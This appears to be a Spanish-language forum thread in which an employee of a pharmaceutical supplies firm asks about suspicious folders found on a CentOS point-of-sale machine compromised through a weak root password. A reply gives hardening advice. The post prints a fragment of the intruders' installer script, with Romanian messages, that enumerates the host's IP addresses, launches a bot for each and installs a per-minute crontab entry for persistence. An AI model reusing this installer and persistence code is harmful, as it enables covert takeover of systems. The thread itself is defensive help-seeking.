saludos para todos

les cuento:

trabajo para una empresa dedicada ala compra y venta de insumos farmacologicos, en los puntos de venta tenemos instalado el sistema operativo: Centos y en otros red hat o sea todo lo trabajamos con linux y ademas tenemos un software empresarial q tambien solo funciona con linux...hace poco instalamos un nuevo punto con Centos y con un nuevo motor de base de datos: Postgres ya que normalmente utilizamos Informix... tuvimos el descuido en dejar una clave de root muy facil y despues de unos dias nos dimos cuenta que ni siquiera podiamos entrar por ssh (desde otro pc) y tampoco en el punto de venta, luego de varios procedimientos logramos ingresar por root y pues encontramos una carpeta sospechosa, se llama asi  /opt  y estaba en /root

dentro de esta carpeta hay dos subcarpetas llamadas aubit4gl (averigue es un emulador de base de datos)   y  la otra: bomfunk (no se que es)
dentro de aubit4gl hay mas subcarpetas con archivos planos los cuales tienen codigo sql y otras cosas mas por ej: hay una subcarpeta /bin con archivos: adbaccess, adecompile, amake, sql_parse, otra subcarpeta /etc con archivos boostrap, configsub  y hay muchos mas archivos la otra bomfunk tiene mas archivos  con codigos y textos en ingles como si fueran conversaciones

entons pregunto
-todo esto hace parte de algun programa?
-cual es la finalidad de estos programas?
-que tan grave es?
-que debo hacer para evitarlos?

agradezco la ayuda y colaboracion---

un archivo de esos dice asi (si alguien sabe y me informa que significa)
#!/bin/bash
if [ $# != 1 ]; then
   echo "######Un cadou de la Riko pentru Bomfunk######"
       echo "#+#+#+ bine lucrat hackere !!"
        echo "Tasteaza : ./start canal "
   echo "P.S : fara diez!"
        exit;
fi
/sbin/ifconfig | grep -v "inet6" |grep "inet" | tr ':' ' '| awk '{ print $3 }' |grep -v "127.0.0.1" > vhosts
nrs=`cat vhosts | grep -c .`
######variabile######
D=1
B=./vhosts
######install######
echo "######Un cadou de la Riko pentru Bomfunk######"
echo "@@@@ bine lucrat hackere !!"
sleep 1
echo "Am gasit $nrs ip-uri"
sleep 1
while read line; do
   ./inst $1 $line
case "$D" in
"1")
echo -e "\b\.\c"
D=2
echo -e "\b\...\c"
D=4
;;
"4")
echo -e "\b\....\c"
D=1
;;
esac
 done < $B
echo -e "\bGata"
./autorun
./run
#!/bin/sh
pwd > mech.dir
dir=$(cat mech.dir)
echo "* * * * * $dir/update >/dev/null 2>&1" > cron.d
crontab cron.d
crontab -l | grep update
echo "#!/bin/sh
if test -r $dir/m.pid; then
pid=\$(cat $dir/m.pid)
if \$(kill -CHLD \$pid >/dev/null 2>&1)
then
exit 0
fi
fi
cd $dir

pues han conseguido comprometer tu sistema, el idioma de los echo es rumano, tal vez t de una pista revisa los logs del server cambia el pass del root por uno robusto elimina esos archivos y verifica no se haya filtrado ninguna info sensible instala un firewall e intenta instalar algun mecanismo contra ataques de fuerza bruta o diccionarios al pass, intenta declarar algun filtrado ip y si es posible mac e ip juntos para loguearse como root por ejemplo solo se puede loguear como root 127.0.0.1 o sea la ip del localhost la cual es muy dificil de spoofear salu2

nadie???? alguien q me ayude por fa..necesito recopilar informacion